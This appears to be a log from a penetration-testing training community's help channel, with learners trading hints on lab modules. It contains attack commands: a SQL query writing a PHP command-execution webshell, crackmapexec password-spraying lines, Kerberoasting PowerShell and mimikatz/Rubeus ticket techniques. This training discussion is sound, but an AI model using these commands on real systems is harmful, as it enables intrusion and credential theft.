#modules
what happens when u type the address in?
Can someone assist with: WEB SERVICE & API ATTACKS - Question: Identify the username of the user that has a position of 736373 through SQLi. | I have located the vulnerable parameter and SQLi using SQLmap, but I don't understand how to get the info for the position with this knowledge.
Anyone available for a nudge on metasploit module?
Hello
Please am new to crypto
I wanna invest but don't know how and where
I think I need assistance
am I in the right place to find a good crypto trader??
No
hi anyone knows how to encode the decoded cookie?
i tried all the ways
decode the HTBPERSISTENT cookie by URL decode and then MAGIC from cyberchef
how do you recode back?
and send to request?
section Documentation & Reporting Skills Assessment, I have creds of user ||dhawkins||, ping sweep i have 4 hosts. Using crackmapexec for checking but get nothing, can anyone help me out? thanks
Try --local-auth
have u done that section?
it's simpler than you think
don't unnecessarily over complicate things, use what you have and build on top of it
yeah
can i DM you? i just ask something about hint
sure np
I just hit this same problem, This post was very helpful with finding a solution #modules message
Thanks so much for helping me, and pointing me out. GG 
you're welcome
attack common services easy lab i dont get how to execute webshell
hellou
im trying to install hcxtools but doesnt work
i use : git clone https://github.com/ZerBea/hcxtools.git, cd hcxtools, make && make install
and i have this error `
somebody can help?
anyone knows how after decoding and modifying?
Yes, if you still need help
Need a nudge on SQLMap - Bypassing Web App Protections - Case #10
[CRITICAL] an error occurred while evaluating provided code ('TypeError: Strings must be encoded before hashing')
Tried a couple of other things and its not quite clear if this is the path forward, missing some understanding and would like a nudge if possible
did you manage to solve? I am stuck also exactly where you are
Anybody that did the module server attacks?
try adding single quotes around the password
or remove it and type it in once you are asked
yeah, I am currently on the v**** machine, in the end I ended up using ||chisel|| (1.7.4) and I was able to connect through proxychain with rdp, no idea because previously it would not let me connect
yep, For that module I ended up downloading the chisel 1.7.4 binary
Any understanding on why this does not run or work I'm so confused
ip is still alive?
yup just reset it
hmm
and redid all the steps to recreate new file etc
Try sudo
guys I need help for skills assessment port forwarding
I stuck here: Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.
I have no clue what to do next
feels like stuck for eternity
I found creds have access to w*** the pivot is 172.*
What commands are you running?
I am about to try it with chisel I guess that one will work, cuz in of the sections I have done it using chisel
yes, it did work, thank you
hey, actually stuck in Navigator (linux fundamentals), with the question about inode number of sudoers. tried cd /etc, ls -i sudoers it gave me 964110 but that's wrong. Any help? This is not the first time the question was asked, but there's no answer
make sure you have connected to the target
I haven't done the module, but your prompt looks like the pwnbox prompt. Are you supposed to connect to a box first?
but it is saying "Connected to htb-sirnzpckwl.htb-cloud.com:1 (htb-ac710058)"??
i'm supposed to connect to a target
i'll try by ssh
Hello, I'm stuck in Skills assessments on pivoting, tunneling and port forwarding, I found the credentials of v--- as well as the ip address 172.16.6.*, the point is that when I connect remotely from m---, I have the same folders as m--- as well as the network settings, any idea how to proceed?
how did you get to v*** password?
||mimikatz||
fvck no, I was trying it now
thanks
I thought I have to transfer the file .dat and it appears that it "does not" exist when I try dir in cmd
Hi,
I'm stuck on Attacking Common Services - Easy
I am connected to the database. I try to launch a reverse shell but it does not work.
I don't understand, especially if I write a test file and I want to open it on my browser I can't find it.
If I make a request to read the file from the DB it finds the file.
I write it in C:\xampp\htdocs\ which is normally the right place.
I get another inode, and it works with the ssh one
you can dm me
Ok, thanks
was able to figure it out!
mhm
can you verify that file actually exists?
Password Attacks - Hard Lab : hi guys, does anyone know how to move the || logins.kdbx || to attacker machine? tried via ||smbserver|| but windows blocks the connection
I used impacket-smbserver but there are plenty of ways to transfer it
what command are you executing? It also looks like you're not using Pwnbox so make sure your VPN is properly connected.
ssh user1@165.227.228.154
you're not specifying the port. By default SSH uses 22. You need to add -p 31459
ohh thank you why did I not think of this
make sure you read everything carefully and slowly😉 In the question it tells you how to use the command
oh sorry! had a typo on my question, yes i used what u used but it refuses to send
Yee, I ping the IP and it was not responding so I thought there might be a problem
can you send the command you're executing?
wow. the medium lab for the attacking common services is WAY easier than the "easy" lab. lol geez
|| sudo python3 smbserver.py -smb2support AttackerPC /home/htb-blablabla/Desktop/ ||
Yes file exists
File exists / its there / cant tab complete to it etc
try ||impacket-smbserver ||
could you verify with a ls and pwd ?
||You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.||
this is from my windows cmd
okay yes
I keep getting stuck on pretty much every module at least a few times because the target IP stops responding. I've taken up a habit of just resetting the target a few times whenever I feel like I'm not progressing (and usually that was the problem). It's getting a bit irritating to not know whether I'm doing something wrong or if the target is down. Is there a fix for this?
tried looking around if there was something to turn off but can't do much without admin rights
so the problem isn't Windows blocking it (well technically). If you remember from the File Transfers module, Windows will block unauthenticated requests. If you setup a username and password (which I'd recommend doing all the time) it should work.
if you haven't done the File Transfer module, I'd highly recommend it
good notes are important!
not only will it help you with the CPTS exam (which I'm assuming you're on), but once you're done you basically have a cheatsheet/playbook for future assessments
i always make sure to download the cheatsheets and add some notes to them, but yeah i missed this ahah
ty
imo I'd build your own notes and use the cheatsheets as a secondary resource
yeah thats something i wanna do, just gotta find the time to make it all from scratch
if I were you I'd start now. Especially before you get to some of the "heavy" modules
I used this command still not working ssh user1@165.227.228.154 -p 32520
nevermind now it is working
so odd
Cool I'm glad to hear that , i'm stuck with the reverse shell at the easy.
i hope finish this module today but it's late 18h in France
how did you upload it? and did you try a webshell?
yeah tomorrow imma spend the day on that 🙂 , im around 70% done before getting the exam voucher
(btw yeah, file transfer worked, ty again)
Sorry just got back yes verifying now
Hey, i am trying "Nibbles - Initial Foothold". Every time i try to upload a file with the plugin My Image it ends with this: The connection was reset
The connection to the server was reset while the page was loading.
The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer’s network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.. The VPN is still running.
I try to upload a reverse shell from the database connection
i can create the file and read it from the DB but when i try to read from my browser nothing happens.
Anybody tried Credential Hunting in Linux lately, my box crashes after like 2 minutes of hydra which is mighty annoying
i had to use a php webshell. its listed in the example sheets how to put it there. and did you verify which folder you're writing it to? thats important
i see on the FTP is in the basic folder : C:\xampp\htdocs\
weird... I haven't done the SQLMap module yet, but I just tested the command and it works for me. Valid HTTP request in the file (which would be a different error, but worth a try)?
yea I can copy as curl and send
and it works
but I cannot save to file then call it its so weird
try copy and pasting it to a different file and try that
ok good. try writing the webshell there and using that instead of a reverse shell. for some reason they dont want to start
Yea just did
mhmmm I'm not sure then
Yea its been stumping me, + question has stumped me for like 4 hours now
lol
hurting my brain
Need to get this figured out before I take the test 😦
I need help in Web Proxies module > Skill assessment > Intercepting Response question
I'm doing what exactly need to do but didn’t get the flag !! Changed disabled to enable and forward the request from Burp > turn interception off in burp and click get the flag button
This is the page source after modifying HTML code
It does say enable but not showing me flag
what am I missing ?
I'm sorry I'm sharing in multiple channel but I see more people are active here
try doing it from PwnBox or if you're in a PwnBox a VM.
Yea ill switch to pwn box , prob works perfect there lol
you could also try updating the system (tool) first to see if that works
I use this command :
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\\xampp\\htdocs\\webshell.php';
And this for access to the webshell
https://10.129.203.7/webshell.php?c=whoami
But the same ...
Yea I full updated , its an arch repo
I thought maybe i fucked up something and went clean install as well
Ill get it figured out eventually or keep crying lol
that looks about right....maybe http?
i cant remember if i did http or https
Did you try using the full path instead?
@proud pine yes i've done full path as well
lol way to put a damper on my hopes that the hard lab would be the easiest one because they got them backwards
Oh yes thanks is good !
I tried http but I was redirected to https every time but this one works
I just have to find where the flag is !
Thanks a lot!
Nope, lol. The easiest so far was the med_lab (crazy), but the hard_lab is god awful. Possible worse than the "easy lab".
np. should be easy after you use 'whoami'
Show the error with the full path?
aww crap. ok. better mentally prepare myself
The annoying thing is, i can feel i am close, as in the last one of two steps, but i've hit a wall, hard, and nothing is working.
well im not gonna look at your spoilers just yet. im gonna start the enumeration stuff pretty soon though
1 sec
Full path worked this time...what ....I dont care
it worked LOL ty
So I'm lost on Attacking Common Services - Easy. I've got the full username and after exhausting other paths it seems I need to brute-force the password which goes against what you should do in real life but it's what everyone is saying to do. However, I keep getting locked out from multiple services due to too many password attempts. I'm using the provided password file as well. I could wait for the lockout to end and pick up on the next set of passwords but that seems silly. Any thoughts?
if you're using hydra slow down the threads
also try other popular wordlists as well
cool will give that a try
Lol the medium is a joke ^^
let's go to the hard ! 😉
im starting to think that the medium they wanted us to go in a different direction with the pop3 but i mean....if its an exploit its an exploit
Good evening! Who can give a hint?
Active Directory BloodHound:BloodHound for BlueTeams:Which relationship (edge) do we need to remove to break the path between David and Domain Admins?
So it's working down the list much further since reducing the threads. I guess the service isn't getting locked out from too many login attempts but from how many attempts occurred simultaneously?
looks at the GUI, what's between David and Domain Admin?
yea. closes the connection because there are too many incoming connections
Thanks. Totally assumed the wrong reason
np
I need some help with SQL map essentials OS exploitation, once I get to the os-shell I can't go anywhere, I've uploaded shell.php to the target but don't "hear" anything on netcat... any help into the right direction of finding the 2nd flag would be greatly appreciated.
Hey, i'm stuck here I don't know what else to do with that code the terminal gave me, or maybe im taking the wrong path.
You found the flag for a different question
need to deobfuscate the js in api.min.js
now i'm here trying to do some code analysis but i don't have info about these functions or what they do, can i get a hint?
personally Id replace the eval with a js print and then run it in a sandbox
sounds like you should read through the section materials again
Can someone tell me were im wrong?
https://gyazo.com/add5a3f0efa23854c5e8271867fb01d4
https://gyazo.com/e191ed86c07d1037689203f21607acb0
Ok. Cant read SRY
I did the same thing don't worry
careful with spoilers pls
Can someone please help me with the CrackMapExec Module : Skill Assessment
I cannot get a single hit for the correct password during spraying
Is there anybody that can help with the hard lab attacking common services?
I did. But when i do, my msg gets deleted, even with all the spoiler tags.
Can someone please help me with the CrackMapExec Module : Skill Assessment
I cannot get a single hit for the correct password during spraying
As I have been having so much trouble trying to get a password hit i basically bruteforced the answer to the question first; "What's the password of the account you found?" I've used the correct answer I have for the question to password spray against all accounts I found using --rid-brute enumeration action.
I've password sprayed against all hosts within the network without success:
Using these commands:
proxychains4 -q crackmapexec winrm 172.16.15.3 -u users.txt -p Password1
proxychains4 -q crackmapexec ldap dc01.inlanefreight.local -u users.txt -p Password1 // hosts updated
proxychains4 -q crackmapexec smb 172.16.15.3 -u users.txt -p Password1
proxychains4 -q crackmapexec mssql 172.16.15.15 -u users.txt -p Password1 --local-auth
proxychains4 -q crackmapexec mssql 172.16.15.15 -u users.txt -p Password1 -d .
proxychains4 -q crackmapexec mssql 172.16.15.15 -u users.txt -p Password1
proxychains4 -q crackmapexec smb 172.16.15.15 -u users.txt -p Password1
proxychains4 -q crackmapexec winrm 172.16.15.15 -u users.txt -p Password1
proxychains4 -q crackmapexec winrm 172.16.15.15 -u users.txt -p Password1 --local-auth
proxychains4 -q crackmapexec winrm 172.16.15.20 -u users.txt -p Password1 --local-auth
proxychains4 -q crackmapexec winrm 172.16.15.20 -u users.txt -p Password1
proxychains4 -q crackmapexec smb 172.16.15.20 -u users.txt -p Password1
proxychains4 -q crackmapexec smb 172.16.15.20 -u users.txt -p Password1 --local-auth
How did you get the token?
Can anyone help me on AD Enumeration & Attacks - Skills Assessment Part II Q4. - Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
I created a username list with two letters and numbers and combined that with valid users on jsmith. I created a small password dictionary file. Sprayed many times but no luck.
try one of the ones they use for examples
thanks
Hi all,
I'm in the AD Enumeration & Attacks - Skills Assessment Part I, Question 2 Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433.
I'm trying to follow section Kerberoasting - from Windows, targeting a single user.
||First adding the System.IdentityModel.
PS> Add-Type -AssemblyName System.IdentityModel
Then perform the Kerberoasting attack:
PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"
New-Object : Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]: verify that the assembly
containing this type is loaded.
At line:1 char:1
+ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidType: (:) [New-Object], PSArgumentException
+ FullyQualifiedErrorId : TypeNotFound,Microsoft.PowerShell.Commands.NewObjectCommand
Problem is I get the error Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]. But shouldn't that have been added by the Add-Type -AssemblyName System.IdentityModel command?
Any suggestions on how to proceed?||
I think i used
||Get-DomainUser * -SPN | get-domainspn something||
I already got the SPN, it's given in the question text.
ahh i missed your question.
Can someone give me a nudge on web attacks skills assessment.Ive got the UID, PHPSESSID, and the token.
Have you tried a way of logging in as the admin?
can i dm?
sure
I'm stuck there too. Can you give another hint maybe? if you remember the task 🙂
is there a trick to reading a file in a smb share that is "read only"
ive tried !cat file.txt
it says file not found
So im in the Attacking Web Applications with ffuf - Filtering Results. I have added the academy.htb to /etc/hosts/ but when I try to actually access the website nothing. When I run the ffuf -w /SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htp:30771/ -H 'Host: FUZZ.academy.htb' -fs 900 to even see if admin is a subdomain I get back nothing. Is there something i'm doing wrong?
can someone help me with question 119 ?
Not 100% sure since my note is not great, but I think i used powerview get-domainuser something. The easiest way to find the command is checking the cheatsheet from the academy.
Okay 🙂
time for the AD Skill Assessment 😅
Glad I have other voyagers on this. Would have been lonely.
good luck!
its the midboss of CPTS for good reason. Easily my fav skill assessment in the course
Anyone else have this issue when trying to start Nessus?
looks like you dont have the service file on that machine
I'll reset it see if the next machine has it
same issue.... -
Something is broken
nm, I guess you don't need to start the service it was already started
looks like its looking for nessus.service but yours is nessusd.service
oh Duh - still didn't allow me to run start|status|stop commands lol but http://IP:8834 works anyways
Please I have a question from the Password Attacks module -
Forging tickets through overpass the hash or pass the key is relevant only when a user's ticket has expired yes? Because I cant really understand why else there would be a need to request a ticket with rubeus using the rc4 hash when you could dump tickets. clarifications would be helpful thank you!
Also Please, Is it possible to use Rubeus entirely for a Pass the ticket attack? I understand the only way to present a ticket to Rubeus is through Rubeus.exe ptt /ticket:B64_TICKET but the ticket here in question requires you converting a mimikatz exported ticket kirbi file into base64 and using here OR Using Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$RC4_HMAC /ptt but then the only way showed in the module to get the RC4_HMAC hash is thru mimikatz. The exercise asks to try practicing with both mimikatz alone and rubeus alone thats why I have these questions, thank you anybody
EDIT : I understand now loool
Hello all. I was going through Active Directory LDAP module and i don't know why it doesn't work the answer i am providing to the question **"What is the domain functional level?"** I am using the tool that basically gives me the response, but then when i am pasting it, it says it is wrong. Can anyone provide some help?
@faint rampart Noob take here. If you can crack the users hash and retrieve a cleartext password, I believe Rubeus can generate RC4 + AES keys.
In regards to your previous question, I believe you're using the users hash to acquire a terminal session with that users TGT? It's been a while since I did that module or played around with mimi/rubeus.
okay okay
Thank you so much, I will search for the command for that, this module is fun but really confusing me only in the PtT aspects anyways maybe im overthinking
Yes for forging a ticket, overpass the hash aims at converting the RC4 keys into a ticket with Rubeus so you can pass the ticket and gain a session as the target user or do other stuff But my question here is, Is there a need to forge tickets(aside from TGT expiring) when you can dump tickets with both mimikatz and Rubeus
Good question. I'd say it's because perhaps the user you are looking for doesn't have any tickets stored in memory on that host.
So you use rubeus to interact with the KDC, supplying a properly encrypted password in order to get a ticket.
Again, I'm super new to this stuff, so don't take my responses as absolute lol
But yea, your reasoning makes sense too. I'm not sure how to restore an expired ticket; gotta get a new one.
okay this makes sense, thank you very much!
yeah tickets have a TTL of 8/10hours for validity after which a new one has to be requested...
Thank you very much!
@faint rampart sure thing bud
if you still need help with nibbles let me know
not the server for this, get lost
Thanks for the heads up. My issue was I did not create a comprehensive username dictionary. I simply created a file by changing the numbers without touching the letters. ha!!
This was very interesting because the windows tool does the work for you, which was a great lesson for me.
interesting, thats not the part of it I thought you were doing wrong lol but hey if it works it works
guys no one answers me?
not the server for this
or rather at least not the channel
in fact i was asking where could i find someone to ask
bro i can't write in that channels
...
i ve written on this for a reason lol
youre dense
i'm a newbie
if you cant read simple discord channel instructions youre not gunna fare well in your pursuits
its not supposed to be this difficult
youll get your answers if you do
how do I run an exploit that I found using searchsploit? I copied the exploit to my machine, but when I try to use it by typing the file name, it says command not found
depends on the exploit
often you have to make sure its executable and make sure youre specifying the path, but you absolutely need to read the instructions for it first. Many exploits wont work or worse unless you do what they say which may involve minor modifications
sometimes the exploit is just a text file that tells you how to manually do it
how do i find the instructions for it? I typed 47887.py --help, but it said command not found
you read it
read it first, then chmod +x ./47887.py to mark it as executable and then can run it with ./47887.py
I did that, but it still says command not found
thats more specific here, its having an issue with a line in the code itself
youll need to run the appropriate python interpreter for it
likely python3 or python2.7
so just throwing it out there. they should attempt to explain the syntax a little more for the common services hard lab on abusing the mssql
adding python to the beginning worked! thanks @thorn urchin
even with research that was a brain exploder
Hello, I'm stuck in the skills assessments module (pivoting, tunneling and port forwarding) I currently have the v and m credentials, I have port forwarded between both machines to access the workstation, but I couldn't due to access or timeout problems. Any help please? (I'm stuck on question number 5 btw). Can anyone help me with this please?
How did you get access because I am dumb as well 😄
Explore with root
hello
You are using the 'auxiliary/scanner/http/coldfusion_locale_traversal' tool within Metasploit, but it is not working properly for you. You decide to capture the request sent by Metasploit so you can manually verify it and repeat it. Once you capture the request, what is the 'XXXXX' directory being called in '/XXXXX/administrator/..'?
i have done in msfconsole
how to find XXXXX and what to do next?
If only there's a way to print the working directory
I have a question about the Pass the Hash section in Password Attacks. It shows how julio can access the \dc01\julio directory, but it says nothing about how to access the files within it. I can't find that information anywhere in the lesson. It's like it just skips over that. Does anyone know how that is accomplished?
can someone give a hint on where to find the ldapadmin password for the windows privesc skills assessment task part 1?
I figured it out. It helps if you specify the whole path when you use the "more" command.
umm...the "more" command? I dont remember something like that. hmmm. I already tried running searches for ldapadmin mentioned in files from the c:\ directory and not much success from that, can you give another hint?
Sorry, that wasn't meant as a response to your question. I was saying that I answered my own previous question.
ah oh, been stuck on this for a long time, thought that finally someone answered 😆
Hi all,
I'm in the AD Enumeration & Attacks - Skills Assessment Part I, Question 2 Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433.
I'm trying to follow section Kerberoasting - from Windows, targeting a single user.
||First adding the System.IdentityModel.
PS> Add-Type -AssemblyName System.IdentityModel
Then perform the Kerberoasting attack:
PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"
New-Object : Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]: verify that the assembly
containing this type is loaded.
At line:1 char:1
+ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidType: (:) [New-Object], PSArgumentException
+ FullyQualifiedErrorId : TypeNotFound,Microsoft.PowerShell.Commands.NewObjectCommand
Problem is I get the error Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]. But shouldn't that have been added by the Add-Type -AssemblyName System.IdentityModel command?
Any suggestions on how to proceed?||
i didnt understand what you mean, could i dm you?
try another Windows tool
I only have a webshell, there are no tools on the machine to begin with and the upload function of the webshell is not working?
if you have a webshell, you can upload/download files right?
Hi guys
hello
How are yall doing?
Can someone help me out with broken authentication skill assessment and here is what I know
I know how the cookie works.
|| I know how to find valid users and something to do with country code. ||
fine 🙂 and you
I have tried || alpha 2 and 3 code
Ex support.AF and support.AFG and replace . With some other char || but no luck.
Whenever i upload i get:
And no file appears in the directory
Hey guys, I'm doing password attacks - easy lab and I'm trying to bruteforce ftp with username.list and password.list. It's taking quite a time and I'm scared I'm doing something wrong, but I don't see any other options
You do everything right
It just takes a long time
Ayy, I am not permitted to send messages #HTB:serious discussions channels, wy tho
Do i need to cross a certain level
You need to verify your account #welcome
danke 
Anyone available to help with the CrackMapExec module Skill Assessment?
I've tried everything from the course content now and I've had no success
So …. There are many files or scripts that you can use to have a reverse shell. I used a powershell script by nishang. Also the web application has some sort of WAF or rules (or it may just dont like certain file extensions) that doesnt allow certain format.
||I managed without a reverse shell at all 😄 Rubeus.exe was able to upload for some reason, then I enabled RDP which allowed me to run the ping sweep to find MS01 and then netsh.exe to pivot ||
That is very interesting. I will try that! Thanks for the info!
Hey, yes i still have the same problem
I just finished Introduction to Academy and Learning Process. Does anyone recommend any tier 0 modules to start off?
I am having constant trouble with the academy labs. I can't finish a single attack before the target drops offline and i lose access.
if you're talking about the Silver Annual, you do not get cubes. only the Silver, Gold, and Platinum monthly subscriptions give cubes through subscriptions
but if you buy the Silver Annual, you will have access to the entire CPTS path and earn cubes from completing the modules within it.
Hello guys, can someone help me about an error i get in the "Soccer" (easy) machine? im following a writeup step for step but im still getting an error i dont know how to debug. please DM me!
Read #welcome please and verify. This is not the channel for boxes.
oh sorry!
Ah sorry, it is silver annual
Ohh was curious cuz there were some tier 3 modules that look interesting that I wanted and it wasn’t in those role path
yup so you'll either need to complete courses and earn those cubes, buy those cubes separately, or buy a Silver, Gold, or Platinum monthly subscription. HTB Seasons also offer cube rewards now as well
Oh wait if I have a silver monthly sub and I buy the silver annual
Do I keep the silver monthly sub?
If that’s the case I can just pay that and slowly do and save up for the tier 3 stuff
I can't answer that as I do not know. I'd assume the answer is no though, one would overwrite the other.
npnpn I will say if you need cubes always buy the monthly plans over the cubes themselves (unless you want/need a module in the moment).
Tbh i was considering the gold monthly for like 2 months and buy the course
But is like cheaper by only a bit
the student plan is always the best if it's available for you. once I finish though I'll probably get the platinum monthly to knock out some Tier III modules
np good luck on whatever you decide!
&Xd*Gz5d
I am stuck on this module also. I have answered the first question. I have found another user and their shares with creds but those creds can't be passed anywhere. No luck getting access for the second question at all.
Are you on the skill assessment ?
Yes
PM'd
attack common services easy lab how do i execute my payload
I assume that you already sent your file to the server with the extension .php, what happens if you do ||name.php?cmd=whoami|| in the url?
from https it just downloads the file from http nothing 404
where did you upload it to?
if anyone has any knowledge on the broken authentication wfuzz module please let me know. all responses show 200 and im unsure how to distinguish
djikstra please mask the username since it is a part of a question
That time it takes you hours to do the "easy" module and 5 min to do the "medium" one 🙃
DM me
Is anyone around that understands Web Attacks - Advanced File Disclosure. I was able to get the flag using CDATA but struggling to get it with Error Based XXE. I want to ensure I understand both methods and not doing something dumb.
Can someone help me with question 2 of AD Enumeration & Attacks - Skills Assessment Part I? I've tried a few things but haven't made any progress...
Lol I suffered on this problem as well. Restart worked for me. If you find out why it didn't work at the first time, please let me know.
#prolabs-aptlabs
Anyone working on File Upload Typefilter?
Hey need some help on the Page Fuzzing of Attacking Web Applications with Ffuf. I dont know if the server is broken or im doing something wrong
Hello fellows, quick question please ^^ We often face the following situation: Initial windows Host obtained with a reverse shell -> autoroute + socks + proxychains to a 2nd windows host. The question is -> what is your "best" method to upload stuffs (like mimikatz) on the 2nd windows host? I can easily transfer stuff to the first host (dozens of ways), but I struggle to send over to the second host. Oftentimes, there is no python on the first host or ftp server. I can upload nc64.exe on the first host... but no nc on the second 😦 THANKS for your ideas ^^
xfreerdp 😄
(the transfer module does not specify that much; often all the tools are available in c:\Tools)
yes, but nope, I have one shell in msfconsole and the other one with proxychains xfreerdp
so both msfconsole or CTRLC / V can't help
If it's in c:\tools then use it there, if not then there is the wget / invoke-webrequest
yup thats also my second go-to
but to wget, you need a webserver on the first host ; which we don't have 😉
But also using the windows remote access tool, in advanced options you can select it to share the files from the system you're using
you can always check the cheat sheet in the file transfer module
This has more to do with pivoting in general than file transfer
hey any ideas why I always have to use -Pn with nmap when scanning boxes now? I didn't used to have to do that. I can connect to the boxes and do the exercises just fine.
Yep ^^ did that, but I might have missed something then. My use case is: msfconsole on one hand. xfreerdp with proxychains on the other hands
how to transfer files easily between both
Clure
exactly
It also helps if you tell us what module you're doing
And the section
Rather than just saying you are having an issue
Maybe my question was not at the right place. it's more "a general matter". But to answer you, I'm doing the first skill assessment in the AD-Enumeration-and-Attacks
You can also mount your files to the Windows system with xfreerdp, try looking at the man page to find that option
By telling us this, you help us understand where you're at, if someone else has completed this a different way they can nudge you in a different direction
sure
So I'm at the question Find cleartext credentials for another domain user. Submit the username as your answer. ; trying to upload pillaging tools on the host I have a shell on through proxychains xfreerdp; if someone can help ^^ Thx
just copy paste
Have you done the module Attacking Web Applications with Ffuf?
For File upload Type filters, I can successfully upload the file File successfully uploaded But I'm getting The requested URL was not found on this server. when I try to browse the file after I upload it.
Hi I'm stuck at network enumeration with nmap
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
Can someone help me with this question please? I'm trying sudo nmap $IP -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53 -sV but I don't get back the version
run a nmap -sV $IP
@dapper temple I don't get back anything useful shouldn't it give a flag or something? Not sure which service they are talking about
maybe its running on a weird port. so you'd need to run that same command for all ports
Anyone for Data Movement in Intro To Assembly Language? I add mov rax, [rsp] at the end of the attached code but I get a segmentation fault.
Hello, currently stuck on the Server-Side Attacks Module, Nginx Reverse Proxy & AJP.
Each time I try to set up the enviroment I got this message:
nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:65
I assume im not setting up the nginx.conf file correctly?
i dont understand how on AD enum and attacks acl primer the answer to "Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?" isnt generic write when in the same lesson it says. "GenericWrite - gives us the right to write to any non-protected attribute on an object. If we have this access over a user, we could assign them an SPN and perform a Kerberoasting attack (which relies on the target account having a weak password set). Over a group means we could add ourselves or another security principal to a given group. Finally, if we have this access over a computer object, we could perform a resource-based constrained delegation attack which is outside the scope of this module."
I think I have the answer for you but let me verify real quick before I mislead you
ok tyvm cuz its makin me mad. lol
Okay, basically GenericWrite is technically a correct answer, theres just a more correct answer that uses the phrase more specifically
is it one of the aces shown in the module?
yeah, they use the line of the question verbatim
damn i must be really be blind today ty
np
use pwnbox or parrot it will work..
i give up i reread it 3 times the answer isnt GenericWrite WriteSPN or WriteOwner i then proceeded to try every ace on the page lol
Maybe you should get some sleep and try it again later then lol
when I say verbatim I mean verbatim
you can ctrl-f it
i did it didnt show up lmfao
what exactly did you search for
the word targeted only appears twice in the section. Once in the question and once in the answer lol
i tried kerb
I struggled as well but bloodhound indicated the answer pretty noticeably.
its very literal
you def dont need bloodhound for this question
not even a lab environment for this Q
Oopps sorry
i didnt capitalize generic all ffs
I thought it was about the lab.
didnt know the g needed to be capital rip
lol
and i assumed it needed to be more specifically about kerberoasting not less
Anyone know where I'm going wrong with this output? (File upload exercises)
||The image “http://1$IP:$PORT/profile_images/text..phar.jpg” cannot be displayed because it contains errors.||
whats your payload
Try .jpg..phar 🙂
Hi, I'm in Password Attacks Lab - Medium, and I got the d** user information and the ssh file. What do I do next?
and how would I ever have known to switch that?
In that module, they show you a script which appends file extensions 🙂
I use that, inside burp Intruder
cause the section content mentions how some applications only process the last extension used
the content is getting more obscure. I mean I knew something was funky with that filename because it was returning that error. I had to loop through running curl trying to find a commonality. It got my brain going in circles either doing nearly the same thing, expecting a different result
anyone that has done Login Brute Forcing that i can DM with some doubts?
these web modules are driving me completely nuts, the machines are very unstable to me. totally slowing me down. Am I the only one? This did not happen at all with the previous ones
Web Attacks Skill Assessment - was a fun one and wasn't as bad as I thought it would be. Almost got stuck and had to ask but pulled through.
yeah lmk if you need help with login brute forcing
You get this?
that moment when you waste 90min trying shit before you realise you just skipped the bit of text that hints at where to get the foothold so that you don't have to do that 🥲
Yeah one of them I had to restart the box 50 times and finally got one that showed the UID.
Module: Attack Common Service / SQL
I can login to BD with the htbdbuser credentials but I can’t do anything inside the DB. Please give me some ideas! Thanks!
Hi, how do I scan 172.16.6.x?
you either need to be on the first host; or use the first host as a proxy-host
@fathom pendant Thanks. Should I be expecting to scan a Workstation and DC from that? because I was not able to scan anything from 172.16.6.x, not sure if there is anything I miss out
Google what a Ping sweep is and how to do it within Powershell or CMD if your first host is Windows, terminal if Linux
hey guys I am a beginner here, having a bit of trouble on the very last section of the Getting Started module. Its called 'knowledge check' and I've been at it for a while now. I've taken detailed notes of the info gained on the target box, and tried to follow the procedures taught throughout the module, and have managed to gain access to the website on port 80 as admin. I think I'm supposed to be able to gain reverse shell access to the webserver with my admin privileges, but I'm having trouble. ): there are 2 plugins installed but I don't think I can reconfigure them. Am I supposed to download a 3rd plugin that would give me reverse shell access? Or am I going down the wrong rabbit hole..? I'm lost!
hope I posted this question in the right place. thanks in advance
no need to download a plugin. See what you can do with your current access
okay I'll look again thank you!
Who is willing to help me with active subdomain enumeration? Because i cant figure it out
Ok so I just wanted to checkout the academy and see what was there. I just opened linux fundamentals. And they want me to give the command to start a http server using php
Now I know how to do that.
And I even verified it on my own box for a sanity check.
well so i have to find sub domains
what tool are they using?
ye
hosts
i found the nameserver with dig
Add to your host file
the name server?
I think you are asking the wrong resolver.
You have to specify the resolver 😉
Take the IP of your target
htb is not a valid top level domain.
It can only be used internally.
add it to /etc/hosts
The name server?
ip and server
It will ask you
Since htb is not a toplevel domain as bunny pointed out
But it will resolve if you add it to the hostfile
yes its internal right
alright, why dont they mention it in the first place
because they mention it in the previous tasks
Either way, it's too buggy
Press Ctrl-C to quit.
Just started the frakking http server
Still the answer is wrong
fun
127.0.0.1 is always you 😂

wow, I feel the rage
I mean you could normally argue that I dont know what I'm doing
and?
You just had to add it to the host and dig?
When it comes to subdomain enum further down the line. Use amass, learn it from the start
ffuf is also good since it's written in GO and thats some nice network speed
So wait. They wanted you to make a zone transfer
How far are you in this module that I assume is called DNS
You have several types of transfers as well.
im doing the web information gathering
where the hell do i find vhost list in seclists
